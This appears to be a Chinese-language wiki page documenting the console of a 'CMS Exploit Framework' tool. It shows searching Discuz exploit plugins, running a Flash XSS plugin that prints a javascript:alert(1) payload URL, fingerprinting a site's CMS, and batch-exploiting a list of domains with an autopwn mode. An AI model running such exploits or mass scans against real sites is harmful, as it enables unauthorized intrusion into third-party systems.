-
Notifications
You must be signed in to change notification settings - Fork 70
chuhades edited this page Dec 13, 2014
·
1 revision
python console.py
-
help: 帮助信息 -
version:显示框架版本信息 -
update:更新插件列表 -
rebuild_db:重建数据库 -
list:查看插件列表 -
search <keyword>:通过关键字搜索插件 -
info <plugin>:显示插件信息 -
options:显示当前插件选项 -
use <plugin>:选择插件 -
set <option> <value>:设置插件选项 -
exploit:运行当前插件 -
vulns:查看已探测到的漏洞信息 -
vulns -d:清空已探测到的漏洞信息 -
vulns -o <plugin>:保存已探测到的漏洞信息到文件 -
exit:退出框架
注:
[1] 命令中可以使用 tab 补全
CMS Exploit Framework > search discuz
Matching Plugins
================
Name Scope Description
---- ------- -----------
discuz_faq_gids_sqli Discuz 7.1-7.2 /faq.php 参数 gids 未初始化 导致 SQL 注入
discuz_flvplayer_flash_xss Discuz! x3.0 /static/image/common/flvplayer.swf Flash XSS
CMS Exploit Framework > use discuz_flvplayer_flash_xss
CMS Exploit Framework > discuz_flvplayer_flash_xss > info
Name: discuz_flvplayer_flash_xss
CMS: discuz
Scope: Discuz! x3.0
Author:
Chu <[email protected]>
Description:
/static/image/common/flvplayer.swf Flash XSS
Reference:
http://www.ipuman.com/pm6/138/
CMS Exploit Framework > discuz_flvplayer_flash_xss > options
Name Current Setting Required Description
---- --------------- -------- -----------
URL True 网站地址
CMS Exploit Framework > discuz_flvplayer_flash_xss > set URL http://bbs.xxoo.com
URL => http://bbs.xxoo.com
CMS Exploit Framework > discuz_flvplayer_flash_xss > exploit
[*]Requesting target site
[+]Exploitable!
[+]http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
CMS Exploit Framework > discuz_flvplayer_flash_xss > vulns
Vulns
=====
Plugin Vuln
------ ----
discuz_flvplayer_flash_xss http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
用于探测目标站点所使用的 CMS。
选项:
-
URL:网站地址 -
Thread:线程数
CMS Exploit Framework > discuz_flvplayer_flash_xss > use multi_whatweb
CMS Exploit Framework > multi_whatweb > set URL http://www.discuz.net
URL => http://www.discuz.net
CMS Exploit Framework > multi_whatweb > exploit
[+]http://www.discuz.net: discuz
漏洞批量利用。
选项:
-
Plugins:插件列表,以,分隔。All表示启用所有插件。 -
Target:网站地址。 -
Target_file:网站地址文件,用于从文件读取网站地址。 -
WhatWeb:是否在通过whatweb插件探测 CMS 后再进行利用,Y为是,N为否。 -
Thread:进程数
CMS Exploit Framework > use multi_autopwn
CMS Exploit Framework > multi_autopwn > set Plugins discuz_flvplayer_flash_xss
Plugins => discuz_flvplayer_flash_xss
CMS Exploit Framework > multi_autopwn > set Target_file /tmp/domains.txt
Target_file => /tmp/domains.txt
CMS Exploit Framework > multi_autopwn > exploit
[*]Loading Plugins
[*]Loading multi_whatweb
[+]http://bbs.xxoo.com: discuz
[+]http://www.discuz.net: discuz
[+]http://rs.xxoo.com: discuz
[*]Loading discuz_flvplayer_flash_xss
[*]Requesting target site
[*]Requesting target site
[*]Requesting target site
[*]Requesting target site
[+]Exploitable!
[+]http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);
Vulns
=====
Plugin Vuln
------ ----
discuz_flvplayer_flash_xss http://bbs.xxoo.com/static/image/common/flvplayer.swf?file=1.flv&linkfromdisplay=true&link=javascript:alert(1);